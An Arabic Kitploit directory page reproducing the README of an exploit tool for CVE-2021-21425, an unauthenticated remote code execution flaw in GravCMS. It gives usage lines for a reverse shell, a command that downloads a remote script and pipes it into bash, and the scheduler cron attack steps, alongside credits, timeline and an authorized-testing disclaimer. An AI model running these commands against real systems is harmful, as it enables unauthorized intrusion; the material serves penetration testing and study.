Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21425 — CVE-2021-21425 - GravCMS 1.10.7 ثغرة RCE غير مصادق عليها عبر المجدول. استغلال محسّن مع وسائط CLI وترميز base64 تلقائي. | Kitploit
أدوات/GitHubGitHub/d4ytox/cve-2021-21425
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubd4ytox/cve-2021-21425

CVE-2021-21425

CVE-2021-21425 - GravCMS 1.10.7 ثغرة RCE غير مصادق عليها عبر المجدول. استغلال محسّن مع وسائط CLI وترميز base64 تلقائي.

عرض المستودع
111منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-21425 - GravCMS RCE بدون مصادقة

إثبات مفهوم محسّن لـ CVE-2021-21425، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في GravCMS <= 1.10.7 عبر كتابة YAML عشوائية إلى المجدول (scheduler).

الفضل

هذا عمل مشتق. الثغرة والاستغلال الأصلي ليسا ملكي.

الدورمن
الثغرة اكتشفهاMehmet Ince (@mdisec)، PRODAFT / INVICTUS Europe — مارس 2021
إثبات المفهوم الأصلي بواسطة"legend" — Exploit-DB EDB-49973
التعديلات في هذا المستودع بواسطةd4ytox

ما الذي تغيّر في هذه النسخة

يتطلب EDB-49973 الأصلي تحرير القيم المضمّنة يدويًا في السكربت. تضيف هذه النسخة:

  • وسائط سطر الأوامر للهدف، LHOST، LPORT
  • ترميز base64 تلقائي لحمولة الـ reverse shell
  • دعم أوامر مخصصة (-c)
  • معالجة الأخطاء ومخرجات الحالة

هذه تغييرات في قابلية الاستخدام لاستغلال موجود. لا يُدّعى أي بحث في الثغرات.

الثغرة

الحقلالقيمة
CVECVE-2021-21425
EDB-ID49973
المتأثرGravCMS <= 1.10.7
النوعRCE بدون مصادقة
CVSS9.8 (حرجة)

تفشل إضافة Grav Admin في التحقق من المصادقة على مسارات إدارية معينة، مما يسمح للمستخدمين غير المصادق عليهم بكتابة إعدادات YAML عشوائية. يستغل هذا الاستغلال إعدادات المجدول لإنشاء مهمة cron تنفّذ تعليمات PHP برمجية عشوائية.

الاستخدام

# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# Custom command
python3 exploit.py -t http://target -c "id"

أمثلة

# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"

المتطلبات

pip install requests

كيف يعمل

  1. يجلب /admin لاستخراج رمز admin-nonce (لا يتطلب مصادقة بسبب الثغرة)
  2. يرسل POST إلى /admin/config/scheduler مع إعدادات مهمة cron الخبيثة
  3. ينفّذ المجدول حمولة PHP عبر /usr/bin/php -r eval(base64_decode(...))
  4. يكتب PHP الـ reverse shell المفكوك من base64 إلى /tmp/rev.sh وينفّذه

تعمل مهمة cron كل دقيقة (* * * * *)، لذا يصل الـ shell خلال 60 ثانية.

الجدول الزمني

  • 2021-03-18 - اكتشف Mehmet Ince الثغرة أثناء اختبار اختراق
  • 2021-03-29 - الإفصاح عنها
  • 2021-04-01 - تم ترقيعها في Grav Admin Plugin 1.10.8

المراجع

  • مدخل NVD
  • استشارة أمان GitHub GHSA-6f53-6qgv-39pj
  • التحليل الأصلي بواسطة Mehmet Ince (Pentest Blog)
  • إثبات المفهوم الأصلي - Exploit-DB EDB-49973

الترخيص

MIT، ينطبق فقط على التعديلات في هذا المستودع. لا يحمل إثبات المفهوم الأصلي أي ترخيص، لذا تبقى جميع الحقوق محفوظة لمؤلفه. راجع LICENSE للحصول على إشعار الإسناد الكامل.

إخلاء المسؤولية

لاختبار الأمان المصرّح به فقط. تأكد من حصولك على إذن كتابي قبل الاختبار ضد أي نظام.

تنزيل الأداة